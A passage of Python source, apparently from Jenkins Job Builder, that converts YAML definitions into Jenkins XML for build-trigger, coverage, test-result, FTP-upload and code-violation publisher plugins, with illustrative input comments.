tconfigs.set('class', 'java.util.Collections$EmptyList')
projects = XML.SubElement(tconfig, 'projects')
if isinstance(project_def['project'], list):
projects.text = ",".join(project_def['project'])
else:
projects.text = project_def['project']
condition = XML.SubElement(tconfig, 'condition')
condition.text = project_def.get('condition', 'ALWAYS')
trigger_with_no_params = XML.SubElement(tconfig,
'triggerWithNoParameters')
trigger_with_no_params.text = str(
project_def.get('trigger-with-no-params', False)).lower()
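# Illustrative input (a hypothetical sketch, not taken from the test
# fixtures): each element of 'data' describes one BuildTriggerConfig, e.g.
#
#   data = [{'project': ['deploy-staging', 'notify'],
#            'condition': 'UNSTABLE_OR_BETTER',
#            'predefined-parameters': 'ENV=staging\nDRY_RUN=false',
#            'current-parameters': True}]
#
# which yields a comma-separated <projects> value plus
# PredefinedBuildParameters and CurrentBuildParameters config entries.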
def trigger(parser, xml_parent, data):
"""yaml: trigger
Trigger non-parametrised builds of other jobs.
:arg str project: name of the job to trigger
:arg str threshold: when to trigger the other job (default 'SUCCESS'),
alternatives: SUCCESS, UNSTABLE, FAILURE
Example:
.. literalinclude:: /../../tests/publishers/fixtures/trigger_success.yaml
:language: yaml
"""
tconfig = XML.SubElement(xml_parent, 'hudson.tasks.BuildTrigger')
childProjects = XML.SubElement(tconfig, 'childProjects')
childProjects.text = data['project']
tthreshold = XML.SubElement(tconfig, 'threshold')
threshold = data.get('threshold', 'SUCCESS')
supported_thresholds = ['SUCCESS', 'UNSTABLE', 'FAILURE']
if threshold not in supported_thresholds:
raise JenkinsJobsException("threshold must be one of %s" %
", ".join(supported_thresholds))
tname = XML.SubElement(tthreshold, 'name')
tname.text = hudson_model.THRESHOLDS[threshold]['name']
tordinal = XML.SubElement(tthreshold, 'ordinal')
tordinal.text = hudson_model.THRESHOLDS[threshold]['ordinal']
tcolor = XML.SubElement(tthreshold, 'color')
tcolor.text = hudson_model.THRESHOLDS[threshold]['color']
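# Illustrative input (a hypothetical sketch, not taken from the test
# fixtures):
#
#   data = {'project': 'downstream-job', 'threshold': 'UNSTABLE'}
#
# produces a <hudson.tasks.BuildTrigger> whose <threshold> holds the name,
# ordinal and color looked up from hudson_model.THRESHOLDS['UNSTABLE'].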
def clone_workspace(parser, xml_parent, data):
"""yaml: clone-workspace
Archive the workspace from builds of one project and reuse them as the SCM
source for another project.
Requires the Jenkins :jenkins-wiki:`Clone Workspace SCM Plugin
<Clone+Workspace+SCM+Plugin>`.
:arg str workspace-glob: Files to include in cloned workspace
:arg str workspace-exclude-glob: Files to exclude from cloned workspace
:arg str criteria: Criteria for build to be archived. Can be 'any',
'not failed', or 'successful'. (default any)
:arg str archive-method: Choose the method to use for archiving the
workspace. Can be 'tar' or 'zip'. (default tar)
:arg bool override-default-excludes: Override default ant excludes.
(default false)
Minimal example:
.. literalinclude::
/../../tests/publishers/fixtures/clone-workspace001.yaml
:language: yaml
Full example:
.. literalinclude::
/../../tests/publishers/fixtures/clone-workspace002.yaml
:language: yaml
"""
cloneworkspace = XML.SubElement(
xml_parent,
'hudson.plugins.cloneworkspace.CloneWorkspacePublisher',
{'plugin': 'clone-workspace-scm'})
XML.SubElement(
cloneworkspace,
'workspaceGlob').text = data.get('workspace-glob', None)
if 'workspace-exclude-glob' in data:
XML.SubElement(
cloneworkspace,
'workspaceExcludeGlob').text = data['workspace-exclude-glob']
criteria_list = ['Any', 'Not Failed', 'Successful']
criteria = data.get('criteria', 'Any').title()
if 'criteria' in data and criteria not in criteria_list:
raise JenkinsJobsException(
'clone-workspace criteria must be one of: '
+ ', '.join(criteria_list))
else:
XML.SubElement(cloneworkspace, 'criteria').text = criteria
archive_list = ['TAR', 'ZIP']
archive_method = data.get('archive-method', 'TAR').upper()
if 'archive-method' in data and archive_method not in archive_list:
raise JenkinsJobsException(
'clone-workspace archive-method must be one of: '
+ ', '.join(archive_list))
else:
XML.SubElement(cloneworkspace, 'archiveMethod').text = archive_method
override_default_excludes_str = str(
data.get('override-default-excludes', False)).lower()
override_default_excludes_elem = XML.SubElement(
cloneworkspace, 'overrideDefaultExcludes')
override_default_excludes_elem.text = override_default_excludes_str
def cloverphp(parser, xml_parent, data):
"""yaml: cloverphp
Capture code coverage reports from PHPUnit
Requires the Jenkins :jenkins-wiki:`Clover PHP Plugin <Clover+PHP+Plugin>`.
Your job definition should pass to PHPUnit the --coverage-clover option
pointing to a file in the workspace (ex: clover-coverage.xml). The filename
has to be filled in the `xml-location` field.
:arg str xml-location: Path to the coverage XML file generated by PHPUnit
using --coverage-clover. Relative to workspace. (required)
:arg dict html: When present, whether the plugin should generate an HTML
report. Note that PHPUnit already provides an HTML report via its
--coverage-html option which can be set in your builder (optional):
* **dir** (str): Directory where HTML report will be generated relative
to workspace. (required in `html` dict).
* **archive** (bool): Whether to archive HTML reports (default true).
:arg list metric-targets: List of metric targets to reach, must be one of
**healthy**, **unhealthy** and **failing**. Each metric target can take
two parameters:
* **method** Target for method coverage
* **statement** Target for statements coverage
Whenever a metric target is not filled in, the Jenkins plugin can fill in
defaults for you (as of v0.3.3 of the plugin the healthy target will have
method: 70 and statement: 80 if both are left empty). Jenkins Job Builder
will mimic that feature to ensure a clean configuration diff.
Minimal example:
.. literalinclude:: /../../tests/publishers/fixtures/cloverphp001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/cloverphp002.yaml
:language: yaml
"""
cloverphp = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.cloverphp.CloverPHPPublisher')
# The plugin requires clover XML file to parse
if 'xml-location' not in data:
raise JenkinsJobsException('xml-location must be set')
# Whether HTML publishing has been checked
html_publish = False
# By default, disableArchiving = false. Note that we use
# reversed logic.
html_archive = True
if 'html' in data:
html_publish = True
html_dir = data['html'].get('dir', None)
html_archive = data['html'].get('archive', html_archive)
if html_dir is None:
# No point in going further, the plugin would not work
raise JenkinsJobsException('htmldir is required in a html block')
XML.SubElement(cloverphp, 'publishHtmlReport').text = \
str(html_publish).lower()
if html_publish:
XML.SubElement(cloverphp, 'reportDir').text = html_dir
XML.SubElement(cloverphp, 'xmlLocation').text = data.get('xml-location')
XML.SubElement(cloverphp, 'disableArchiving').text = \
str(not html_archive).lower()
# Handle targets
# Plugin v0.3.3 will fill defaults for us whenever healthy targets are both
# blanks.
default_metrics = {
'healthy': {'method': 70, 'statement': 80}
}
allowed_metrics = ['healthy', 'unhealthy', 'failing']
metrics = data.get('metric-targets', [])
# list of dicts to dict
metrics = dict(kv for m in metrics for kv in m.items())
# Populate defaults whenever nothing has been filled by user.
for default in default_metrics.keys():
if metrics.get(default, None) is None:
metrics[default] = default_metrics[default]
# The plugin would at least define empty targets so make sure
# we output them all in the XML regardless of what the user
# has or has not entered.
for target in allowed_metrics:
cur_target = XML.SubElement(cloverphp, target + 'Target')
for t_type in ['method', 'statement']:
val = metrics.get(target, {}).get(t_type)
if val is None or type(val) != int:
continue
if val < 0 or val > 100:
raise JenkinsJobsException(
"Publisher cloverphp metric target %s:%s = %s "
"is not in valid range 0-100." % (target, t_type, val))
XML.SubElement(cur_target, t_type + 'Coverage').text = str(val)
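# Illustrative input (a hypothetical sketch, not taken from the test
# fixtures):
#
#   data = {'xml-location': 'build/clover-coverage.xml',
#           'html': {'dir': 'build/coverage-html', 'archive': False},
#           'metric-targets': [{'healthy': {'method': 80, 'statement': 90}},
#                              {'failing': {'statement': 50}}]}
#
# The 'unhealthy' target is left out here, so only an empty element is
# emitted for it, while the 'healthy' values override the 70/80 defaults.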
def coverage(parser, xml_parent, data):
"""yaml: coverage
WARNING: The coverage function is deprecated. Instead, use the
cobertura function to generate a cobertura coverage report.
Requires the Jenkins :jenkins-wiki:`Cobertura Coverage Plugin
<Cobertura+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/coverage001.yaml
:language: yaml
"""
logger = logging.getLogger(__name__)
logger.warn("Coverage function is deprecated. Switch to cobertura.")
cobertura = XML.SubElement(xml_parent,
'hudson.plugins.cobertura.CoberturaPublisher')
XML.SubElement(cobertura, 'coberturaReportFile').text = '**/coverage.xml'
XML.SubElement(cobertura, 'onlyStable').text = 'false'
healthy = XML.SubElement(cobertura, 'healthyTarget')
targets = XML.SubElement(healthy, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'CONDITIONAL'
XML.SubElement(entry, 'int').text = '70'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'LINE'
XML.SubElement(entry, 'int').text = '80'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'METHOD'
XML.SubElement(entry, 'int').text = '80'
unhealthy = XML.SubElement(cobertura, 'unhealthyTarget')
targets = XML.SubElement(unhealthy, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'CONDITIONAL'
XML.SubElement(entry, 'int').text = '0'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'LINE'
XML.SubElement(entry, 'int').text = '0'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'METHOD'
XML.SubElement(entry, 'int').text = '0'
failing = XML.SubElement(cobertura, 'failingTarget')
targets = XML.SubElement(failing, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'CONDITIONAL'
XML.SubElement(entry, 'int').text = '0'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'LINE'
XML.SubElement(entry, 'int').text = '0'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'METHOD'
XML.SubElement(entry, 'int').text = '0'
XML.SubElement(cobertura, 'sourceEncoding').text = 'ASCII'
def cobertura(parser, xml_parent, data):
"""yaml: cobertura
Generate a cobertura coverage report.
Requires the Jenkins :jenkins-wiki:`Cobertura Coverage Plugin
<Cobertura+Plugin>`.
:arg str report-file: This is a file name pattern that can be used
to locate the cobertura xml report files (optional)
:arg bool only-stable: Include only stable builds (default false)
:arg bool fail-no-reports: fail builds if no coverage reports are found
(default false)
:arg bool fail-unhealthy: Unhealthy projects will be failed (default false)
:arg bool fail-unstable: Unstable projects will be failed (default false)
:arg bool health-auto-update: Auto update threshold for health on
successful build (default false)
:arg bool stability-auto-update: Auto update threshold for stability on
successful build (default false)
:arg bool zoom-coverage-chart: Zoom the coverage chart and crop area below
the minimum and above the maximum coverage of the past reports
(default false)
:arg str source-encoding: Override the source encoding (default ASCII)
:arg dict targets:
:targets: (packages, files, classes, method, line, conditional)
* **healthy** (`int`): Healthy threshold (default 0)
* **unhealthy** (`int`): Unhealthy threshold (default 0)
* **failing** (`int`): Failing threshold (default 0)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/cobertura001.yaml
:language: yaml
"""
cobertura = XML.SubElement(xml_parent,
'hudson.plugins.cobertura.CoberturaPublisher')
XML.SubElement(cobertura, 'coberturaReportFile').text = data.get(
'report-file', '**/coverage.xml')
XML.SubElement(cobertura, 'onlyStable').text = str(
data.get('only-stable', False)).lower()
XML.SubElement(cobertura, 'failUnhealthy').text = str(
data.get('fail-unhealthy', False)).lower()
XML.SubElement(cobertura, 'failUnstable').text = str(
data.get('fail-unstable', False)).lower()
XML.SubElement(cobertura, 'autoUpdateHealth').text = str(
data.get('health-auto-update', False)).lower()
XML.SubElement(cobertura, 'autoUpdateStability').text = str(
data.get('stability-auto-update', False)).lower()
XML.SubElement(cobertura, 'zoomCoverageChart').text = str(
data.get('zoom-coverage-chart', False)).lower()
XML.SubElement(cobertura, 'failNoReports').text = str(
data.get('fail-no-reports', False)).lower()
healthy = XML.SubElement(cobertura, 'healthyTarget')
targets = XML.SubElement(healthy, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
for item in data['targets']:
item_name = next(iter(item.keys()))
item_values = item.get(item_name, 0)
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry,
'hudson.plugins.cobertura.targets.'
'CoverageMetric').text = str(item_name).upper()
XML.SubElement(entry, 'int').text = str(item_values.get('healthy', 0))
unhealthy = XML.SubElement(cobertura, 'unhealthyTarget')
targets = XML.SubElement(unhealthy, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
for item in data['targets']:
item_name = next(iter(item.keys()))
item_values = item.get(item_name, 0)
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.'
'CoverageMetric').text = str(item_name).upper()
XML.SubElement(entry, 'int').text = str(item_values.get('unhealthy',
0))
failing = XML.SubElement(cobertura, 'failingTarget')
targets = XML.SubElement(failing, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
for item in data['targets']:
item_name = next(iter(item.keys()))
item_values = item.get(item_name, 0)
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.'
'CoverageMetric').text = str(item_name).upper()
XML.SubElement(entry, 'int').text = str(item_values.get('failing', 0))
XML.SubElement(cobertura, 'sourceEncoding').text = data.get(
'source-encoding', 'ASCII')
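# Illustrative input (a hypothetical sketch, not taken from the test
# fixtures):
#
#   data = {'report-file': '**/coverage.xml',
#           'targets': [{'line': {'healthy': 80, 'unhealthy': 60, 'failing': 50}},
#                       {'method': {'healthy': 70}}]}
#
# Each entry in 'targets' becomes one <entry> under healthyTarget,
# unhealthyTarget and failingTarget, with the metric name upper-cased
# (LINE, METHOD, ...) and any missing threshold defaulting to 0.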
def jacoco(parser, xml_parent, data):
"""yaml: jacoco
Generate a JaCoCo coverage report.
Requires the Jenkins :jenkins-wiki:`JaCoCo Plugin <JaCoCo+Plugin>`.
:arg str exec-pattern: This is a file name pattern that can be used to
locate the jacoco report files (default
``**/**.exec``)
:arg str class-pattern: This is a file name pattern that can be used
to locate class files (default ``**/classes``)
:arg str source-pattern: This is a file name pattern that can be used
to locate source files (default ``**/src/main/java``)
:arg bool update-build-status: Update the build according to the results
(default false)
:arg str inclusion-pattern: This is a file name pattern that can be used
to include certain class files (optional)
:arg str exclusion-pattern: This is a file name pattern that can be used
to exclude certain class files (optional)
:arg dict targets:
:targets: (instruction, branch, complexity, line, method, class)
* **healthy** (`int`): Healthy threshold (default 0)
* **unhealthy** (`int`): Unhealthy threshold (default 0)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/jacoco001.yaml
:language: yaml
"""
jacoco = XML.SubElement(xml_parent,
'hudson.plugins.jacoco.JacocoPublisher')
XML.SubElement(jacoco, 'execPattern').text = data.get(
'exec-pattern', '**/**.exec')
XML.SubElement(jacoco, 'classPattern').text = data.get(
'class-pattern', '**/classes')
XML.SubElement(jacoco, 'sourcePattern').text = data.get(
'source-pattern', '**/src/main/java')
# Element text must be a string; follow the same str/lower pattern as the
# other boolean options.
XML.SubElement(jacoco, 'changeBuildStatus').text = str(
data.get('update-build-status', False)).lower()
XML.SubElement(jacoco, 'inclusionPattern').text = data.get(
'inclusion-pattern', '')
XML.SubElement(jacoco, 'exclusionPattern').text = data.get(
'exclusion-pattern', '')
itemsList = ['instruction',
'branch',
'complexity',
'line',
'method',
'class']
for item in data['targets']:
item_name = next(iter(item.keys()))
if item_name not in itemsList:
raise JenkinsJobsException("item entered is not valid must be "
"one of: %s" % ",".join(itemsList))
item_values = item.get(item_name, 0)
XML.SubElement(jacoco,
'maximum' +
item_name.capitalize() +
'Coverage').text = str(item_values.get('healthy', 0))
XML.SubElement(jacoco,
'minimum' +
item_name.capitalize() +
'Coverage').text = str(item_values.get('unhealthy', 0))
def ftp(parser, xml_parent, data):
"""yaml: ftp
Upload files via FTP.
Requires the Jenkins :jenkins-wiki:`Publish over FTP Plugin
<Publish+Over+FTP+Plugin>`.
:arg str site: name of the ftp site
:arg str target: destination directory
:arg bool target-is-date-format: whether target is a date format. If true,
raw text should be quoted (default false)
:arg bool clean-remote: should the remote directory be deleted before
transferring files (default false)
:arg str source: source path specifier
:arg str excludes: excluded file pattern (optional)
:arg str remove-prefix: prefix to remove from uploaded file paths
(optional)
:arg bool fail-on-error: fail the build if an error occurs (default false).
:arg bool flatten: only create files on the server, don't create
directories (default false).
Example:
.. literalinclude:: /../../tests/publishers/fixtures/ftp001.yaml
:language: yaml
"""
console_prefix = 'FTP: '
plugin_tag = 'jenkins.plugins.publish__over__ftp.BapFtpPublisherPlugin'
publisher_tag = 'jenkins.plugins.publish__over__ftp.BapFtpPublisher'
transfer_tag = 'jenkins.plugins.publish__over__ftp.BapFtpTransfer'
plugin_reference_tag = 'jenkins.plugins.publish_over_ftp.' \
'BapFtpPublisherPlugin'
(_, transfer_node) = base_publish_over(xml_parent,
data,
console_prefix,
plugin_tag,
publisher_tag,
transfer_tag,
plugin_reference_tag)
XML.SubElement(transfer_node, 'asciiMode').text = 'false'
def junit(parser, xml_parent, data):
"""yaml: junit
Publish JUnit test results.
:arg str results: results filename
:arg bool keep-long-stdio: Retain long standard output/error in test
results (default true).
:arg float health-scale-factor: Amplification factor to apply to test
failures when computing the test result contribution to the build health
score. (default 1.0)
:arg bool allow-empty-results: Do not fail the build if the JUnit files are
missing (default false).
:arg bool test-stability: Add historical information about test
results stability (default false).
Requires the Jenkins :jenkins-wiki:`Test stability Plugin
<Test+stability+plugin>`.
:arg bool claim-build: Allow claiming of failed tests (default false)
Requires the Jenkins :jenkins-wiki:`Claim Plugin <Claim+plugin>`.
:arg bool measurement-plots: Create measurement plots (default false)
Requires the Jenkins :jenkins-wiki:`Measurement Plots Plugin
<Measurement+Plots+Plugin>`.
:arg bool flaky-test-reports: Publish flaky test reports (default false).
Requires the Jenkins :jenkins-wiki:`Flaky Test Handler Plugin
<Flaky+Test+Handler+Plugin>`.
Minimal example using defaults:
.. literalinclude:: /../../tests/publishers/fixtures/junit001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/junit002.yaml
:language: yaml
"""
junitresult = XML.SubElement(xml_parent,
'hudson.tasks.junit.JUnitResultArchiver')
junitresult.set('plugin', 'junit')
XML.SubElement(junitresult, 'testResults').text = data['results']
XML.SubElement(junitresult, 'keepLongStdio').text = str(
data.get('keep-long-stdio', True)).lower()
XML.SubElement(junitresult, 'healthScaleFactor').text = str(
data.get('health-scale-factor', '1.0'))
XML.SubElement(junitresult, 'allowEmptyResults').text = str(
data.get('allow-empty-results', False)).lower()
datapublisher = XML.SubElement(junitresult, 'testDataPublishers')
if str(data.get('test-stability', False)).lower() == 'true':
XML.SubElement(datapublisher,
'de.esailors.jenkins.teststability'
'.StabilityTestDataPublisher')
if str(data.get('claim-build', False)).lower() == 'true':
XML.SubElement(datapublisher,
'hudson.plugins.claim.ClaimTestDataPublisher')
if str(data.get('measurement-plots', False)).lower() == 'true':
XML.SubElement(datapublisher,
'hudson.plugins.measurement__plots.TestDataPublisher')
if str(data.get('flaky-test-reports', False)).lower() == 'true':
XML.SubElement(datapublisher,
'com.google.jenkins.flakyTestHandler.plugin'
'.JUnitFlakyTestDataPublisher')
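# Illustrative input (a hypothetical sketch, not taken from the test
# fixtures):
#
#   data = {'results': 'build/test-reports/*.xml',
#           'keep-long-stdio': False,
#           'claim-build': True}
#
# archives the matching JUnit XML files and adds the Claim plugin's
# test-data publisher under <testDataPublishers>.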
def cucumber_reports(parser, xml_parent, data):
"""yaml: cucumber-reports
This plugin creates pretty cucumber-jvm html reports on jenkins.
Requires the Jenkins :jenkins-wiki:`cucumber reports
<Cucumber+Reports+Plugin>`.
:arg str json-reports-path: The path relative to the workspace of
the json reports generated by cucumber-jvm e.g. target - leave
empty to scan the whole workspace (default '')
:arg str file-include-pattern: include pattern (default '')
:arg str file-exclude-pattern: exclude pattern (default '')
:arg str plugin-url-path: The path to the jenkins user content url
e.g. :samp:`http://host:port[/jenkins/]plugin` - leave empty if jenkins
url root is host:port (default '')
:arg bool skipped-fails: skipped steps to cause the build to fail
(default false)
:arg bool pending-fails: pending steps to cause the build to fail
(default false)
:arg bool undefined-fails: undefined steps to cause the build to fail
(default false)
:arg bool missing-fails: missing steps to cause the build to fail
(default false)
:arg bool no-flash-charts: use javascript charts instead of flash charts
(default false)
:arg bool ignore-failed-tests: entire build to fail when these tests fail
(default false)
:arg bool parallel-testing: run same test in parallel for multiple devices
(default false)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/cucumber_reports001.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/cucumber_reports002.yaml
:language: yaml
"""
cucumber_reports = XML.SubElement(xml_parent,
'net.masterthought.jenkins.'
'CucumberReportPublisher')
XML.SubElement(cucumber_reports, 'jsonReportDirectory').text = str(
data.get('json-reports-path', ''))
XML.SubElement(cucumber_reports, 'pluginUrlPath').text = str(
data.get('plugin-url-path', ''))
XML.SubElement(cucumber_reports, 'fileIncludePattern').text = str(
data.get('file-include-pattern', ''))
XML.SubElement(cucumber_reports, 'fileExcludePattern').text = str(
data.get('file-exclude-pattern', ''))
XML.SubElement(cucumber_reports, 'skippedFails').text = str(
data.get('skipped-fails', False)).lower()
XML.SubElement(cucumber_reports, 'pendingFails').text = str(
data.get('pending-fails', False)).lower()
XML.SubElement(cucumber_reports, 'undefinedFails').text = str(
data.get('undefined-fails', False)).lower()
XML.SubElement(cucumber_reports, 'missingFails').text = str(
data.get('missing-fails', False)).lower()
XML.SubElement(cucumber_reports, 'noFlashCharts').text = str(
data.get('no-flash-charts', False)).lower()
XML.SubElement(cucumber_reports, 'ignoreFailedTests').text = str(
data.get('ignore-failed-tests', False)).lower()
XML.SubElement(cucumber_reports, 'parallelTesting').text = str(
data.get('parallel-testing', False)).lower()
def cucumber_testresult(parser, xml_parent, data):
"""yaml: cucumber-testresult
Publish cucumber test results.
Requires the Jenkins :jenkins-wiki:`cucumber testresult
<Cucumber+Test+Result+Plugin>`.
:arg str results: results filename (required)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/cucumber_testresult.yaml
:language: yaml
"""
cucumber_result = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.cucumber.'
'jsontestsupport.'
'CucumberTestResultArchiver')
filepath = data.get('results', None)
if filepath is None:
raise MissingAttributeError('results')
XML.SubElement(cucumber_result, 'testResults').text = str(filepath)
def xunit(parser, xml_parent, data):
"""yaml: xunit
Publish tests results. Requires the Jenkins :jenkins-wiki:`xUnit Plugin
<xUnit+Plugin>`.
:arg str thresholdmode: Whether thresholds represent an absolute number
of tests or a percentage. Either 'number' or 'percent'. (default
'number')
:arg list thresholds: Thresholds for both 'failed' and 'skipped' tests.
:threshold (`dict`): Threshold values to set, where missing, xUnit
should default to an internal value of 0. Each test threshold
should contain the following:
* **unstable** (`int`)
* **unstablenew** (`int`)
* **failure** (`int`)
* **failurenew** (`int`)
:arg int test-time-margin: Time margin, in ms, allowed for a report before
it is failed as not new, unless the option **requireupdate** is set for
the configured framework. (default 3000)
:arg list types: Frameworks to configure, and options. Supports the
following: ``aunit``, ``boosttest``, ``checktype``, ``cpptest``,
``cppunit``, ``ctest``, ``dotnettest``, ``embunit``, ``fpcunit``,
``gtest``, ``junit``, ``mstest``, ``nunit``, ``phpunit``, ``tusar``,
``unittest``, and ``valgrind``.
The 'custom' type is not supported.
:type (`dict`): each type can be configured using the following:
* **pattern** (`str`): An Ant pattern to look for Junit result
files, relative to the workspace root.
* **requireupdate** (`bool`): fail the build whenever fresh test
results have not been found (default true).
* **deleteoutput** (`bool`): delete temporary JUnit files
(default true).
* **skip-if-no-test-files** (`bool`): Skip parsing this xUnit type
report if there are no test report files (default false).
* **stoponerror** (`bool`): Fail the build whenever an error occurs
during result file processing (default true).
Example:
.. literalinclude:: /../../tests/publishers/fixtures/xunit001.yaml
:language: yaml
"""
logger = logging.getLogger(__name__)
xunit = XML.SubElement(xml_parent, 'xunit')
# Map our internal types to the XML element names used by Jenkins plugin
types_to_plugin_types = {
'aunit': 'AUnitJunitHudsonTestType',
'boosttest': 'BoostTestJunitHudsonTestType',
'checktype': 'CheckType',
'cpptest': 'CppTestJunitHudsonTestType',
'cppunit': 'CppUnitJunitHudsonTestType',
'ctest': 'CTestType',
'dotnettest': 'XUnitDotNetTestType', # since plugin v1.93
'embunit': 'EmbUnitType', # since plugin v1.84
'fpcunit': 'FPCUnitJunitHudsonTestType',
'gtest': 'GoogleTestType',
'junit': 'JUnitType',
'mstest': 'MSTestJunitHudsonTestType',
'nunit': 'NUnitJunitHudsonTestType',
'phpunit': 'PHPUnitJunitHudsonTestType',
'tusar': 'TUSARJunitHudsonTestType',
'unittest': 'UnitTestJunitHudsonTestType',
'valgrind': 'ValgrindJunitHudsonTestType',
# FIXME should implement the 'custom' type
}
implemented_types = types_to_plugin_types.keys() # shortcut
# Unit framework we are going to generate xml for
supported_types = []
for configured_type in data['types']:
type_name = next(iter(configured_type.keys()))
if type_name not in implemented_types:
logger.warn("Requested xUnit type '%s' is not yet supported",
type_name)
else:
# Append for generation
supported_types.append(configured_type)
# Generate XML for each of the supported framework types
xmltypes = XML.SubElement(xunit, 'types')
for supported_type in supported_types:
framework_name = next(iter(supported_type.keys()))
xmlframework = XML.SubElement(xmltypes,
types_to_plugin_types[framework_name])
XML.SubElement(xmlframework, 'pattern').text = (
supported_type[framework_name].get('pattern', ''))
XML.SubElement(xmlframework, 'failIfNotNew').text = str(
supported_type[framework_name].get('requireupdate', True)).lower()
XML.SubElement(xmlframework, 'deleteOutputFiles').text = str(
supported_type[framework_name].get('deleteoutput', True)).lower()
XML.SubElement(xmlframework, 'skipNoTestFiles').text = str(
supported_type[framework_name].get('skip-if-no-test-files',
False)).lower()
XML.SubElement(xmlframework, 'stopProcessingIfError').text = str(
supported_type[framework_name].get('stoponerror', True)).lower()
xmlthresholds = XML.SubElement(xunit, 'thresholds')
for t in data.get('thresholds', []):
if not ('failed' in t or 'skipped' in t):
logger.warn(
"Unrecognized threshold, should be 'failed' or 'skipped'")
continue
elname = ("org.jenkinsci.plugins.xunit.threshold.%sThreshold" %
next(iter(t.keys())).title())
el = XML.SubElement(xmlthresholds, elname)
for threshold_name, threshold_value in next(iter(t.values())).items():
# Normalize and craft the element name for this threshold
elname = "%sThreshold" % threshold_name.lower().replace(
'new', 'New')
XML.SubElement(el, elname).text = str(threshold_value)
# Whether to use percent or exact number of tests.
# Thresholdmode is either:
# - 1 : absolute (number of tests), default.
# - 2 : relative (percentage of tests)
thresholdmode = '1'
if 'percent' == data.get('thresholdmode', 'number'):
thresholdmode = '2'
XML.SubElement(xunit, 'thresholdMode').text = thresholdmode
extra_config = XML.SubElement(xunit, 'extraConfiguration')
XML.SubElement(extra_config, 'testTimeMargin').text = str(
data.get('test-time-margin', '3000'))
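# Illustrative input (a hypothetical sketch, not taken from the test
# fixtures):
#
#   data = {'types': [{'junit': {'pattern': 'reports/*.xml'}},
#                     {'gtest': {'pattern': 'gtest/*.xml',
#                                'skip-if-no-test-files': True}}],
#           'thresholds': [{'failed': {'unstable': 1, 'failure': 5}}],
#           'thresholdmode': 'percent'}
#
# Each framework maps to its plugin element (JUnitType, GoogleTestType, ...),
# the 'failed' threshold becomes a FailedThreshold element and
# thresholdmode 'percent' sets <thresholdMode> to 2.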
def _violations_add_entry(xml_parent, name, data):
vmin = data.get('min', 10)
vmax = data.get('max', 999)
vunstable = data.get('unstable', 999)
pattern = data.get('pattern', None)
entry = XML.SubElement(xml_parent, 'entry')
XML.SubElement(entry, 'string').text = name
tconfig = XML.SubElement(entry, 'hudson.plugins.violations.TypeConfig')
XML.SubElement(tconfig, 'type').text = name
XML.SubElement(tconfig, 'min').text = str(vmin)
XML.SubElement(tconfig, 'max').text = str(vmax)
XML.SubElement(tconfig, 'unstable').text = str(vunstable)
XML.SubElement(tconfig, 'usePattern').text = 'false'
if pattern:
XML.SubElement(tconfig, 'pattern').text = pattern
else:
XML.SubElement(tconfig, 'pattern')
def violations(parser, xml_parent, data):
"""yaml: violations
Publish code style violations.
Requires the Jenkins :jenkins-wiki:`Violations Plugin <Violations>`.
The violations component accepts any number of dictionaries keyed
by the name of the violations system. The dictionary has the
following values:
:arg int min: sunny threshold
:arg int max: stormy threshold
:arg int unstable: unstable threshold
:arg str pattern: report filename pattern
Any system without a dictionary provided will use default values.
Valid systems are:
checkstyle, codenarc, cpd, cpplint, csslint, findbugs, fxcop,
gendarme, jcreport, jslint, pep8, perlcritic, pmd, pylint,
simian, stylecop
Example:
.. literalinclude:: /../../tests/publishers/fixtures/violations001.yaml
:language: yaml
"""
violations = XML.SubElement(xml_parent,
'hudson.plugins.violations.'
'ViolationsPublisher')
config = XML.SubElement(violations, 'config')
suppressions = XML.SubElement(config, 'suppressions',
{'class': 'tree-set'})
XML.SubElement(suppressions, 'no-comparator')
configs = XML.SubElement(config, 'typeConfigs')
XML.SubElement(configs, 'no-comparator')
for name in ['checkstyle',
'codenarc',
'cpd',
'cpplint',
'csslint',
'findbugs',
'fxcop',
'gendarme',
'jcreport',
'jslint',
'pep8',
'perlcritic',
'pmd',
'pylint',
'simian',
'stylecop']:
_violations_add_entry(configs, name, data.get(name, {}))
XML.SubElement(config, 'limit').text = '100'
